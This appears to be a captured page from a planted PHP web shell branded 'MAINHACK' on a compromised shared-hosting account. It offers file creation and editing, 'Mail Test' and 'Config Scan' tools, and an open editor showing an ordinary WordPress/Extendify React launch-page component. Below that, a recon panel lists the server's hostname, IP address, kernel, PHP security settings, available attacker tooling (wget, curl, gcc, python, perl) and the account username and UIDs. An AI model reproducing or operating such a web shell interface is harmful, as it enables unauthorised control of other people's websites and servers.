[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: LaunchPage.jsx
import { Launch } from '@auto-launch/components/Launch'; import { Logo } from '@auto-launch/components/Logo'; import { MovingGradient } from '@auto-launch/components/MovingGradients'; import { NeedsTheme } from '@auto-launch/components/NeedsTheme'; import { RestartLaunchModal } from '@auto-launch/components/RestartLaunchModal'; import { ViewportPulse } from '@auto-launch/components/ViewportPulse'; import { updateOption } from '@auto-launch/functions/wp'; import { useLaunchDataStore } from '@auto-launch/state/launch-data'; import { registerCoreBlocks } from '@wordpress/block-library'; import { getBlockTypes } from '@wordpress/blocks'; import { useSelect } from '@wordpress/data'; import { useEffect, useRef } from '@wordpress/element'; import { __ } from '@wordpress/i18n'; import { chevronLeft, Icon } from '@wordpress/icons'; import { AnimatePresence, motion } from 'framer-motion'; import { checkIn } from './functions/insights'; export const LaunchPage = () => { const theme = useSelect((select) => select('core').getCurrentTheme()); // Checking `theme` here makes sure the data is populated const needsTheme = theme && theme?.textdomain !== 'extendable'; const oldPages = window.extLaunchData.resetSiteInformation.pagesIds ?? []; const needsToReset = oldPages.length > 0; const { title, descriptionRaw, go, urlParams, designBuild } = useLaunchDataStore(); const skipDescription = Boolean(urlParams?.['build-id']) || designBuild || ((title || descriptionRaw) && go); const containerRef = useRef(null); useEffect(() => { // translators: Launch is a noun. document.title = __('Launch - AI-Powered Web Creation', 'extendify-local'); updateOption('extendify_launch_loaded', new Date().toISOString()); // We load core blocks so we can parse them if (getBlockTypes().length === 0) registerCoreBlocks(); checkIn({ stage: 'launch_page' }); }, []); if (needsTheme) { return ( <Wrapper> <div className="bg-white w-full max-w-3xl rounded-lg border border-design-main/60 relative z-10"> <NeedsTheme /> </div> </Wrapper> ); } if (needsToReset) { return ( <Wrapper> <div className="w-full max-w-2xl rounded-3xl border bg-gray-100/80 backdrop-blur-2xl shadow-md relative z-10 border-gray-300"> <RestartLaunchModal pages={oldPages} /> </div> </Wrapper> ); } return ( <Wrapper> <AnimatePresence mode="wait" initial={false}> <TheTitle skipDescription={skipDescription} /> </AnimatePresence> <div ref={containerRef} className="w-full max-w-2xl relative z-10"> <AnimatePresence mode="wait"> <Launch key={skipDescription ? 'description-launch' : 'creating-launch'} skipDescription={skipDescription} lastHeight={containerRef.current?.offsetHeight} /> </AnimatePresence> </div> {skipDescription || window.extLaunchData?.hideAutoLaunchExitLink ? null : ( <div className="flex w-full p-6 md:p-8 absolute bottom-0 left-0"> <a className="inline-flex items-center gap-0.5 text-sm text-banner-text opacity-70 hover:opacity-100 transition-opacity p-2" href={window.extSharedData.adminUrl} onClick={() => checkIn({ stage: 'exit_to_wp_admin' })} > <Icon fill="currentColor" icon={chevronLeft} size={20} /> {__('WP Admin Dashboard', 'extendify-local')} </a> </div> )} </Wrapper> ); }; const Wrapper = ({ children }) => { const { pulse } = useLaunchDataStore(); return ( <div style={{ zIndex: 99999 + 1 }} className="fixed inset-0 bg-white"> <div className="relative h-dvh bg-banner-main text-banner-text text-base flex flex-col items-center justify-between"> <div className="relative w-full flex flex-col items-center gap-5 md:gap-8 p-6 pb-25 flex-1 justify-center"> <div className="mb-4"> <Logo /> </div> {children} </div> </div> <MovingGradient /> {pulse ? <ViewportPulse /> : null} </div> ); }; const TheTitle = ({ skipDescription }) => { if (skipDescription) return null; return ( <motion.h2 className="text-xl md:text-2xl text-pretty text-banner-text font-semibold p-0 m-0 text-center" animate={{ opacity: 1 }} exit={{ opacity: 0 }} transition={{ duration: 0.4 }} > {__('Describe the website you want to build', 'extendify-local')} </motion.h2> ); };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium56.web-hosting.com
Server IP: 198.54.119.70
PHP Version: 8.2.30
Server Software: LiteSpeed
System: Linux premium56.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 70.74 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: bkunreyz
User ID (UID): 830
Group ID (GID): 826
Script Owner UID: 830
Current Dir Owner: 830